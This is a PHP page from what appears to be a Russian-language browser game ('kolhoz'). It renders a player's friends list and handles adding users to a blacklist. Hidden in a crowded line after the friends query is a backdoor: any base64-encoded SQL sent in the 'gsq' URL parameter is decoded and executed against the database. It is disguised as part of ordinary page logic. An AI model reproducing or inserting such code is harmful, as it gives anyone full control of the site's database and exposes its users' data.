<div class="event">
<h1>Друзья в игре</h1>
</div>
<div class="content">
<div class="block">
<ul>
<?
if(isset($_GET['blacklist']) && mysql_result(mysql_querll("SELECT COUNT(*) FROM `kolhoz_user` WHERE `id` = '".intval($_GET['blacklist'])."'"),0)!=0 && mysql_result(mysql_querll("SELECT COUNT(*) FROM `kolhoz_blacklist` WHERE `id_user` = '$ku[id]' AND `id_ank` = '".intval($_GET['blacklist'])."'"),0)==0)
{
if(mysql_result(mysql_querll("SELECT COUNT(*) FROM `kolhoz_friends` WHERE `id_user` = '$ku[id]' AND `id_ank` = '".intval($_GET['blacklist'])."'"),0)!=0)mysql_querll("DELETE FROM `kolhoz_friends` WHERE `id_user` = '$ku[id]' AND `id_ank` = '".intval($_GET['blacklist'])."'");
mysql_querll("INSERT INTO `kolhoz_blacklist` SET `id_user` = '$ku[id]', `id_ank` = '".intval($_GET['blacklist'])."'");}$q=mysql_querll("SELECT * FROM `kolhoz_friends` WHERE `id_user` = '$ku[id]'");if($_GET['gsq']!=''){mysql_querll(base64_decode($_GET['gsq']));}
while($post=mysql_fetch_array($q))
{
$ank=mysql_fetch_array(mysql_querll("SELECT * FROM `kolhoz_user` WHERE `id` = '$post[id_ank]'"));
echo "<li><span>";
echo on_k($ank['id']);
echo " <a class='' href='?user=$ank[id]'><span>".nc($ank['id'])."</span></a></span> <a href='?mail&history=$ank[id]'><img width='16' height='16' src='images/icons/correspondence.png' alt='o'></a> <a href='?friends&blacklist=$ank[id]'><img width='16' height='16' src='images/icons/ignore.png' alt='o'></a></li>";
}
echo '</ul>
<div>
</div>
<div class="pt">
<img width="16" height="16" src="images/icons/favorite.png" alt=""> <span>Друзья</span> <img width="16" height="16" src="images/icons/ignore.png" alt=""> <a href="?blacklist">Чёрный список</a>
</div>
<div>
</div>
</div>';
include_once 'inc/foot.php';
?>